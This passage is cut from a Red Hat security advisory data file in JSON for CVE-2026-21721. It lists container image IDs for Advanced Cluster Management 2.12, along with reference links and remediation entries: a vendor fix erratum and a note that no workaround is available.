"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-21721"
},
{
"category": "external",
"summary": "RHBZ#2433242",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433242"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-21721",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21721"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-21721",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21721"
},
{
"category": "external",
"summary": "https://grafana.com/security/security-advisories/CVE-2026-21721",
"url": "https://grafana.com/security/security-advisories/CVE-2026-21721"
}
],
"release_date": "2026-01-27T09:07:55.160000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T14:07:27+00:00",
"details": "Before you apply this update, make sure all previously released errata\nthat are relevant to your system are applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5633"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
